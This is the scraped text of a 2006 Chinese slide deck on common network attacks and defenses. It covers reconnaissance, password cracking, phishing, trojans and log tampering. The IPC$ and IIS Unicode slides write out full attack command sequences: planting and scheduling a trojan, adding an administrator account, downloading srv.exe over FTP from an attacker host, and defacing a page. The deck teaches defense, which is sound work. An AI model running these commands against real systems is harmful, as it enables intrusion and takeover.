网络常见攻击技术及防御措施教材课件.ppt

1、网络常见攻击技术及防御措施沈传宁沈传宁 上海三零卫士信息安全有限公司上海三零卫士信息安全有限公司上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 1 计算机网络攻防技术计算机网络攻防技术 l完整的攻击行为踩点(信息收集)入侵留后门抹去痕迹l防范技术针对以上提到的攻击行为提出防范措施上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 2 攻击前奏攻击前奏 l踩点的目的获取对方大概信息主机信息是否存在漏洞密码脆弱性等等指导下一步攻击行为l踩点的方式专用漏洞扫描工具正式渠道：媒体（如搜索

2、引擎、广告介绍等）社会工程学上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 3 信息收集信息收集l扫描是“一切入侵的基础”获取对方操作系统信息获取对方主机开放服务信息获知对方可能存在的漏洞获取对方主机用户列表l常用扫描工具漏洞扫描工具 nessus、X-scanner、ISS、Retina探测扫描工具 nmap、supperscan上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 4 信息收集信息收集 - l国产优秀漏洞扫描器 X-scanner扫描报告示例上海三零卫士信息安全

3、有限公司30wish Information Security网络安全技术讲座2006 5 信息收集信息收集- l漏洞扫描利器 nessus扫描报告示例上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 6 l极好的探测工具 - nmap上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 7 信息收集信息收集-正式渠道（正式渠道（l网站信息举例：某网络提供商在其网站上宣传“特惠服务器租用：RedHat Linux 8.0 支持MY SQL/PHP 采用性能优异的Apache 1.3.

4、XX Web服务器”l搜索引擎Google搜索例：某Web服务器存在致命错误脚本“5sf67.jsp”攻击者可通过搜索引擎查找存在该错误脚本的网站上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 8 入侵行为入侵行为- l真实案例一一位安全专家只花了几个小时就完全控制了一家大公司的网络，他所需要作的仅仅是打了几个电话，他是如何作到？l真实案例二 凯文.米特尼克最擅长的是什么？l真实案例三一个大公司的网管犯的错误？上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 9 入侵行为入侵行

5、为l电子邮件口令破解Pop3信箱口令暴力破解l网页表单破解同样属暴力破解，单位时间内重复提交表单，比较返回结果lWindowNT用户口令破解典型工具：l0pht的nt口令破解工具 l*号密码查看简单编程实现l联众、QQ密码窃取重画登陆窗口上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 10 ID:scn psw:123456Ok,you can login inID:scn psw:No,you can not login in1 12123123412345123456OK,you can login inNo,you can no

6、t login inNo,you can not login inNo,you can not login inNo,you can not login in入侵行为口令攻击示意入侵行为口令攻击示意上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 11 入侵行为入侵行为l工具举例上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 12 入侵行为入侵行为-拒绝服务攻击拒绝服务攻击利用协议漏洞利用协议漏洞利用网络漏洞进行攻击利用网络漏洞进行攻击利用系统漏洞进行攻击利用系统漏洞进行攻击利

7、用服务漏洞进行攻击利用服务漏洞进行攻击大流量洪水攻击大流量洪水攻击上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 13 入侵行为入侵行为- lIPC$是什么ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$)和系统目录winnt或windows(admin$)。所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,

8、从而达到不可告人的目的.l前提例如：使用X-scanner扫描到某Win2K主机允许空连接，且共享IPC$，管理员administrator口令为passwordl目的在目标主机上运行木马程序以完全控制该主机上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 14 l攻击步骤建立连接C:net use 127.0.0.1IPC$ /user:admintitrator拷贝木马服务器端C:copy srv.exe 127.0.0.1admin$ 查看对方时间C:net time 127.0.0.1 定时启动木马服务器端C:at 127.0.

9、0.1 11:05 srv.exe 连接木马新建用户hackerC: net user guest /active:yes 将用户加入管理员组C:net localgroup administrators guest /add 上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 15 入侵行为入侵行为-利用服务漏洞利用服务漏洞(lUNICODE漏洞介绍微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令 当IIS打开文件时，如果该文件名包含unicode字符，它会对其进

10、行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件 l漏洞利用如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容： http:/202.116.33.27/scripts/././winnt/system32/cmd.exe?/c+dir利用这个漏洞查看系统文件内容也是可能的： http:/ 上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 16 入侵行为入侵行为-l攻击步骤拷贝cmd.exe至scripts目录 http:/x.x.x.x/scripts/.

11、%c1%1c./winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsccc.exe 写入ftp批处理文件http:/x.x.x.x/scripts/ccc.exe?/c+echo+open+*.*.*.*hacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo+userhacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo+passhacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo

12、+get+srv.exehacker.txt http:/x.x.x.x/scripts/ccc.exe?/c+echo+byehacker.txt 运行该批处理文件 http:/x.x.x.x/scripts/ccc.exe?/c+ftp+-s:hacker.txt执行下载的文件（木马服务器端） http:/x.x.x.x/scripts/ccc.exe?/c+srv.exe木马客户端连接或者修改其主页http:/x.x.x.x/scripts/ccc.exe?/c+echo+hacked by hahaha c:inetpubwwwrootindex.html 上海三零卫士信息安全有限公司

13、30wish Information Security网络安全技术讲座2006 17 入侵行为入侵行为l漏洞描述微软IIS默认安装情况下带了一个索引服务器（Index Server，在Windows 2000下为Index Service）。默认安装时，IIS支持两种脚本映射：管理脚本（.ida文件）、Internet数据查询脚本（.idq文件）。这两种脚本都由一个ISAPI扩展 - idq.dll来处理和解释。idq.dll实现上存在一个缓冲区溢出漏洞，远程攻击者可以利用此漏洞通过溢出攻击以“Local System”的权限在主机上执行任意指令。由于idq.dll在处理某些URL请求时存在一

14、个未经检查的缓冲区，如果攻击者提供一个特殊格式的URL，就可能引发一个缓冲区溢出。通过精心构造发送数据，攻击者可以改变程序执行流程，以“Local System”的权限执行任意代码。 上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 18 入侵行为入侵行为l攻击步骤傻瓜式的攻击，使用溢出利用程序idq.c编译之后，在命令控制台中运行运行步骤如下C:idq.exe 之后telnet 目的主机的溢出端口，便得到system权限的控制台l其他类似的攻击还有IIS5Hack.exe等其利用了IIS 5.0 .printer ISAPI扩展远程缓

15、冲溢出漏洞 上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 19 IP欺骗欺骗TCP劫持劫持ARP欺骗欺骗DNS欺骗欺骗源径路由欺骗源径路由欺骗上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 20 入侵行为入侵行为-钓鱼式攻击钓鱼式攻击通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，恶意网页、网络游戏、伪造的邮件，恶意网页、网络游戏、伪造的WEBWEB站点、日常性支付行站点、日常性支付行为的知名互联网商务网站为的知

16、名互联网商务网站 ，意图引诱收信人给出敏感信息（，意图引诱收信人给出敏感信息（如用户名、口令、帐号如用户名、口令、帐号 ID ID 、 ATM PIN ATM PIN 码或信用卡详细信息码或信用卡详细信息）的一种攻击方式。）的一种攻击方式。目的：目的： 获取个人帐户信息以得到经济利益。获取个人帐户信息以得到经济利益。上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 21 入侵行为入侵行为-钓鱼式攻击钓鱼式攻击假冒网络银行、网站假冒网络银行、网站 伪造网站：伪造网站： 建立起域名和网页内容都与真正网上银行系统、网上证券交易平台建立起域名和

17、网页内容都与真正网上银行系统、网上证券交易平台极为相似的网站，引诱用户输入账号密码等信息，进而通过真正的极为相似的网站，引诱用户输入账号密码等信息，进而通过真正的网上银行、网上证券系统或者伪网上银行、网上证券系统或者伪 造银行储蓄卡、证券交易卡盗窃造银行储蓄卡、证券交易卡盗窃资金。资金。 http:/ http:/ http:/上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 22 入侵行为入侵行为-钓鱼式攻击钓鱼式攻击 恶意代码：恶意代码： 利用网站脚本，即合法网站服务器程序上的漏洞，在网站利用网站脚本，即合法网站服务器程序上的漏洞，

18、在网站的某些网页中插入恶意的某些网页中插入恶意HtmlHtml代码，屏蔽住一些可以用来辨代码，屏蔽住一些可以用来辨别网站真假的重要信息，利用别网站真假的重要信息，利用cookiescookies窃取用户信息。窃取用户信息。 伪造的伪造的HTTPSHTTPS认证认证 发送多以中奖、顾问、对帐等内容引诱的邮件，引诱用发送多以中奖、顾问、对帐等内容引诱的邮件，引诱用户户 在邮件中填入金融账号和密码，或是以各种紧迫的理在邮件中填入金融账号和密码，或是以各种紧迫的理由要求收件人登录某网页提交用户名、密码、身份证号、由要求收件人登录某网页提交用户名、密码、身份证号、信用卡号等信息，继而盗窃用户资金。信用卡

19、号等信息，继而盗窃用户资金。上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 23 入侵行为入侵行为-钓鱼式攻击钓鱼式攻击恶意软件恶意软件在受害者的在受害者的 PC PC 上首先安装一个恶意的浏览器助手工具上首先安装一个恶意的浏览器助手工具（ Browser Helper Object Browser Helper Object ），然后由其将受害者重），然后由其将受害者重定向到假冒的钓鱼网站。定向到假冒的钓鱼网站。 修改受害者修改受害者 PC PC 上的用来维护本地上的用来维护本地 DNS DNS 域名和域名和 IP IP 地地址映射

20、的址映射的 hosts hosts 文件，这将使得网页浏览器在连接架文件，这将使得网页浏览器在连接架设假冒钓鱼网站的服务器时，却让用户看起来像是访问设假冒钓鱼网站的服务器时，却让用户看起来像是访问目标机构的合法网站。目标机构的合法网站。上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 24 入侵行为入侵行为-钓鱼式攻击钓鱼式攻击 伪造虚假的伪造虚假的URLURL改写改写URLURL： http:/http:/ =zh-zh-CN&ieCN&ie=UTF-8&UTF-8&q=UTF-8&UTF-8&q=asp&Irasp&Ir= = 是是

21、googlegoogle一个用户，实际网页是指向一个用户，实际网页是指向 后后面的面的URLURL。十进制格式十进制格式IPIP欺骗欺骗 利用一串不知所运的数字麻痹用户。例如利用一串不知所运的数字麻痹用户。例如IPIP地址地址202.106.185.75202.106.185.75，转换成十进制就是转换成十进制就是33959918833395991883，在网络中他们是等价的。，在网络中他们是等价的。上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 25 入侵行为入侵行为-钓鱼式攻击钓鱼式攻击迷惑的虚拟域名迷惑的虚拟域名 结合十进制结合

22、十进制IPIP地址，制造迷惑性更强的地址，制造迷惑性更强的URLURL http:/3633633987http:/3633633987 实际是指向实际是指向REDHATREDHAT网站，而不是网站，而不是上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 26 入侵行为入侵行为-钓鱼式攻击钓鱼式攻击间接寻址：间接寻址： 利用可信站点进行网址欺骗的方法。例如通过下面连接：利用可信站点进行网址欺骗的方法。例如通过下面连接： http:/http:/ 在服务器端获取请求信息后，再把用户重新定位到目标网站：在服务器端获取请求信息后，再把用户重新

23、定位到目标网站： UnicodeUnicode解码：解码： UnicodeUnicode编码本身有安全性的漏洞，这种编码可能对识别网址带来不便编码本身有安全性的漏洞，这种编码可能对识别网址带来不便，例如，例如UnicodeUnicode的的”%20 %30”%20 %30”。上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 27 入侵行为入侵行为 l特洛依木马的常见特征随系统自启动修改注册表服务Ini文件设置文件关联比如关联 txt文件 （修改了注册表）自我保护多进程监护无连接技术隐藏进程注册服务DLL注入VXD技术上海三零卫士信息安全

24、有限公司30wish Information Security网络安全技术讲座2006 28 入侵行为入侵行为-l后门可以作什么方便下次直接进入监视用户所有行为、隐私完全控制用户主机l后门放置方式如果已经入侵简单！如果尚未入侵手动放置利用系统漏洞，远程植入利用系统漏洞，诱骗执行上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 29 入侵行为入侵行为- l改写访问日志例如：IIS访问日志位置%WinDir%System32LogFilesW3SVC1exyymmdd.log改写日志的技巧修改系统日期l删除中间文件l删除创建的用户上海三零卫

25、士信息安全有限公司30wish Information Security网络安全技术讲座2006 30 l安装系统补丁l安装杀毒软件l检查系统进程l检查注册表、服务和ini文件l检查开放端口l监视网络通讯l对可疑文件分析l安装防火墙上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 31 l只是介绍了一些简单的攻击行为l以上讲解均为远程攻击，本地攻击同样存在威胁获取用户密码本地提升权限上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 32 安全防范安全防范l关注安全公告，注意打补丁l不打开、不执行来历不明的邮件附件l关闭不必要的服务l安装网络防火墙l安装病毒防火墙l加强系统审核增强密码强度查看进程查看启动项查看网络连接状况查找可疑文件上海三零卫士信息安全有限公司30wish Information Security网络安全技术讲座2006 33 谢 谢！